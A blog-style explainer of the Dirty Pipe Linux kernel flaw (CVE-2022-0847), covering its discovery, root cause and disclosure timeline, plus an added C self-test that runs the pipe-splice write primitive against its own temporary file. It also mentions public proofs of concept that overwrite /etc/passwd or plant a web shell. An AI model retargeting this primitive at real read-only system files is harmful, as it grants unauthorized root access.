A vulnerability, CVE-2022-0847, known as Dirty Pipe, exists in almost all current Linux distributions and allows unprivileged local users to gain root privileges on Linux kernel 5.8 and above. Linux distributions, IoT devices (and possibly Android systems, if they already use kernel 5.8 or higher) are at risk. To make matters worse, an exploit is now publicly known.
Vulnerability CVE-2022-0847 allows root
German developer Max Kellermann disclosed the vulnerability CVE-2022-0847 in this post. The vulnerability, known as Dirty Pipe, has been in the Linux kernel since version 5.8 and allows data to be overwritten in arbitrary read-only files. This can be exploited for privilege escalation, because an unprivileged process can inject code into files that are executed by root processes. The CVE entry describes the vulnerability like this:
A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system. This flaw affects Linux kernel versions prior to 5.17-rc6.
The flaw is similar to CVE-2016-5195, known as Dirty Cow and fixed in 2016, but is easier to exploit, according to Kellermann. The vulnerability has been fixed in Linux 5.16.11, 5.15.25 and 5.10.102. The problem will be the systems in the IoT and Android space that no longer receive Linux kernel updates.
Discovery by chance
The discovery was made by chance via a support ticket about corrupted files. A customer complained that access logs downloaded as .gz archives could not be decompressed. On analysis, a corrupted log file was found on one of the log servers; it could be decompressed, but gzip reported a CRC error at the end. There was no explanation for the corruption.
When the CRC error recurred months later, in the same log file and in other files, Kellermann began investigating and traced it to a bug in the Linux kernel present since version 5.8. The vulnerability, CVE-2022-0847, lies in the pipe mechanism, which is used for unidirectional communication between processes.
Vulnerability in the Pipe Mechanism
The Linux kernel implements a pipe as a ring of struct pipe_buffer entries, each pointing to one page. The writing end pushes data in, the reading end retrieves it. The first write to a pipe allocates a page (room for at most 4 KiB of data). If that write does not fill the page completely, a subsequent write is appended to the existing page instead of allocating a new one; the kernel marks such a buffer as mergeable with the flag PIPE_BUF_FLAG_CAN_MERGE in the flags member of the pipe_buffer. This is how "anonymous" pipe buffers (anon_pipe_buf_ops) work.
When data is spliced() from a file into the pipe, however, the kernel first loads the data into the page cache and then creates a struct pipe_buffer that points directly into the page cache (zero copy). Unlike anonymous pipe buffers, additional data written to the pipe must not be appended to such a page, because the page belongs to the page cache, not to the pipe. The bug is that copy_page_to_iter_pipe and push_pipe did not initialize the flags member of the new pipe_buffer (see the CVE description above), so a stale PIPE_BUF_FLAG_CAN_MERGE left over from an earlier anonymous buffer in the same ring slot survives. The next write() to the pipe is then merged into the page-cache page, which changes the cached contents of a file the user may only read, with no permission check at all. This is what lets an unprivileged user inject and overwrite data in read-only files, including the executables of SUID root programs. Because the page is never marked dirty, the modified data lives only in the page cache and is not written back to disk; for an attacker that is enough, since the next execution of a modified SUID binary is served from the page cache.
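The following C program is an added example and is not code from the original article or from Kellermann's post. It reproduces the primitive described above as a self-test: fill and drain a pipe so that every pipe_buffer slot keeps a stale PIPE_BUF_FLAG_CAN_MERGE flag, splice() one byte of a file into the pipe, then write() into the pipe and check whether the file's page-cache contents changed. The target is a scratch file the program creates itself under /tmp (the path template and the 4 KiB page size are assumptions); it opens that file read-only, because read permission is all the primitive needs. On an unpatched kernel dirty_pipe_check() returns 1, on a fixed kernel 0.

```c
// Added example (not from the original article or from Kellermann's post):
// self-test for the Dirty Pipe primitive against a scratch file of our own.
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

#define PAGE_SIZE 4096   /* assumption: 4 KiB pages */

/* Constraints of the primitive: the target range must lie inside one page and
 * must not start on a page boundary, because the byte *before* the target is
 * spliced into the pipe so that the page-cache page becomes the last pipe_buffer. */
int can_target(long offset, long len)
{
    if (offset <= 0 || len <= 0) return 0;
    if (offset % PAGE_SIZE == 0) return 0;          /* nothing to splice before it */
    long next_page = (offset | (PAGE_SIZE - 1)) + 1;
    return offset + len <= next_page;                /* must not cross into the next page */
}

/* Fill the pipe completely (every buffer becomes mergeable), then drain it.
 * The freed pipe_buffer slots keep their flags; a kernel that forgets to
 * re-initialise them when splicing leaves CAN_MERGE set. */
static int prepare_pipe(int p[2])
{
    static char buf[PAGE_SIZE];
    if (pipe(p)) return -1;
    int pipe_size = fcntl(p[1], F_GETPIPE_SZ);
    if (pipe_size < 0) return -1;
    for (int r = pipe_size; r > 0;) {
        int n = r > (int)sizeof buf ? (int)sizeof buf : r;
        if (write(p[1], buf, n) != n) return -1;
        r -= n;
    }
    for (int r = pipe_size; r > 0;) {
        int n = r > (int)sizeof buf ? (int)sizeof buf : r;
        if (read(p[0], buf, n) != n) return -1;
        r -= n;
    }
    return 0;
}

/* Returns 1 if a write() into the pipe landed in the page cache (vulnerable),
 * 0 if the file was left untouched (fixed kernel), -1 on a setup error. */
int dirty_pipe_check(void)
{
    char path[] = "/tmp/dirtypipe-XXXXXX";     /* assumption: scratch file in /tmp */
    const char *payload = "DIRTY";
    const long offset = 100;                   /* satisfies can_target() */
    char original[2 * PAGE_SIZE], readback[8];
    int p[2] = { -1, -1 };
    int result = -1;

    memset(original, 'A', sizeof original);    /* constructed file content */
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    if (write(fd, original, sizeof original) != (ssize_t)sizeof original) goto out;
    close(fd);

    /* Re-open read-only: the primitive only needs read permission on the target. */
    fd = open(path, O_RDONLY);
    if (fd < 0) goto out;
    if (prepare_pipe(p) < 0) goto out;

    /* Splice the byte just before the target; the page-cache page is now referenced
     * by a pipe_buffer whose flags the buggy kernel never initialised. */
    loff_t off = offset - 1;
    if (splice(fd, &off, p[1], NULL, 1, 0) != 1) goto out;

    /* An ordinary write(); a vulnerable kernel merges it into the page-cache page. */
    if (write(p[1], payload, strlen(payload)) != (ssize_t)strlen(payload)) goto out;

    /* Re-read the target range; it is served from the page cache. */
    if (pread(fd, readback, strlen(payload), offset) != (ssize_t)strlen(payload)) goto out;
    result = memcmp(readback, payload, strlen(payload)) == 0 ? 1 : 0;

out:
    if (p[0] >= 0) close(p[0]);
    if (p[1] >= 0) close(p[1]);
    if (fd >= 0) close(fd);
    unlink(path);
    return result;
}

int main(void)
{
    int r = dirty_pipe_check();
    if (r < 0) { perror("dirty_pipe_check"); return 2; }
    puts(r ? "VULNERABLE: write merged into page-cache page (CVE-2022-0847)"
           : "not vulnerable: page-cache page left untouched");
    return r;
}
```

The check is harmless: it only ever targets its own temporary file, and on a patched kernel the write() simply lands in a fresh anonymous pipe buffer. The can_target() helper encodes the two practical limits of the primitive that Kellermann's write-up also states: the write cannot start on a page boundary and cannot cross one.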
Fixes, disclosure and proof of concept
The support ticket mentioned above, following the customer complaint about broken .gz archives, dates from April 29, 2021, but it was not until February 19, 2022 that Kellermann was able to pinpoint the bug in the Linux kernel. On February 20, 2022, the Linux kernel security team was informed and began preparing a fix, which initializes the flags member of newly created pipe buffers in the two affected functions.
- 2022-02-23: Linux stable releases with fix released (5.16.11, 5.15.25, 5.10.102)
- 2022-02-24: Google adds the fix to the Android kernel
On February 28, the Linux Distros mailing list was informed and on March 7, 2022, the vulnerability was disclosed in this blog post. More details and a proof of concept can also be found there.
The colleagues at Bleeping Computer point out here that a second proof of concept exists, in which a security researcher uses the vulnerability to modify /etc/passwd so that an account ends up with an empty password; a subsequent su root then grants super user privileges. Another security researcher has outlined a way to inject a web shell into a Linux system via the vulnerability.
Linux kernel 5.8 was released in August 2020. The problem now is that kernel patches exist for most Linux distributions, but not every Linux system will actually be patched. IoT devices in particular may be affected in some firmware images, although many of them still run kernels older than 5.8, which are not affected.
Regarding Android, I had a look: Wikipedia says that Android 11 only uses kernel versions 4.14, 4.19 and 5.4, which predate the bug, so for those devices I would cautiously give the all-clear. Android 12 does use kernel 5.10 on some devices (Google's Pixel 6, for example), and the fact that Google added the fix to the Android kernel on February 24, 2022 (see above) shows that shipping Android kernels were affected; such devices need the vendor's kernel update.